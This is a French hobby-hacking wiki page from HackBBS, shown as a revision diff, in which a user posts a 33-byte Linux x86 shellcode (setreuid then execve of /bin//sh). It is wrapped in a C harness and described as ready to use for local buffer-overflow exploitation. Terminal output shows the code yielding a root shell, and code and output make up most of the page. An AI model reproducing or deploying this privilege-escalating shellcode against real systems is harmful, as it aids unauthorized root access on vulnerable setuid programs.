« Hiteck » : différence entre les versions

De HackBBS
Aller à la navigation Aller à la recherche
Blackdevil (discussion | contributions)
Aucun résumé des modifications
Blackdevil (discussion | contributions)
Aucun résumé des modifications
 
(51 versions intermédiaires par le même utilisateur non affichées)
Ligne 1 : Ligne 1 :
<h2>Shellcoding</h2>
<p>
 
<b><u>Mercredi 23 juin 2010</u></b>
 
<br /><br />


<p>
Voila mon nouveau exploit shellcode prêt à être utilisé pour une exploitation de buffer overflow en local :-D
<b><u>Jeudi 17 juin 2010 :</u></b>
<br /><br />
<br />
hiteck@hiteck:~/Bureau/Programmation$ cat exploit.c<br />
Je me lance dans la programmation de shellcode, je trouve les shellcodes super hard lol brefff au boulot :-D
#include <stdio.h><br /><br />
</p>
 
char shellcode[] = "\x6a\x46\x58\x31\xdb\x31\xc9\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";<br /><br />
 
int main(void)<br />
{<br />
printf("\n[+] Exploit shellcode remote");<br />
printf("\n[+] Codé par hit3ck");<br />
fprintf(stdout,"\n[+] Taille: %d\n",strlen(shellcode));<br />
(*(void(*)()) shellcode)();<br />
}<br />
hiteck@hiteck:~/Bureau/Programmation$ ./exploit<br /><br />


<h2>Exploitation Bofs (buffers overflows)</h2>
[+] Exploit shellcode remote<br />
<p>
[+] Codé par hit3ck<br />
************************
[+] Taille: 33<br />
<br />
# whoami<br />
root<br />
# echo "Local exploit shellcode remote :-D"<br />
Local exploit shellcode remote :-D<br />
# exit<br />
hiteck@hiteck:~/Bureau/Programmation$ <br /><br />
Attention le teste de l'exploit shellcode a eu les privilèges root au maximum, donc le programme a exploiter doit donc avoir less privilège root sinon c'est pas la peine.<br /><br />
</p>
</p>

Dernière version du 11 juin 2014 à 18:57

Mercredi 23 juin 2010

Voila mon nouveau exploit shellcode prêt à être utilisé pour une exploitation de buffer overflow en local :-D

hiteck@hiteck:~/Bureau/Programmation$ cat exploit.c
#include <stdio.h>

char shellcode[] = "\x6a\x46\x58\x31\xdb\x31\xc9\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";

int main(void)
{
printf("\n[+] Exploit shellcode remote");
printf("\n[+] Codé par hit3ck");
fprintf(stdout,"\n[+] Taille: %d\n",strlen(shellcode));
(*(void(*)()) shellcode)();
}
hiteck@hiteck:~/Bureau/Programmation$ ./exploit

[+] Exploit shellcode remote
[+] Codé par hit3ck
[+] Taille: 33
# whoami
root
# echo "Local exploit shellcode remote :-D"
Local exploit shellcode remote :-D
# exit
hiteck@hiteck:~/Bureau/Programmation$

Attention le teste de l'exploit shellcode a eu les privilèges root au maximum, donc le programme a exploiter doit donc avoir less privilège root sinon c'est pas la peine.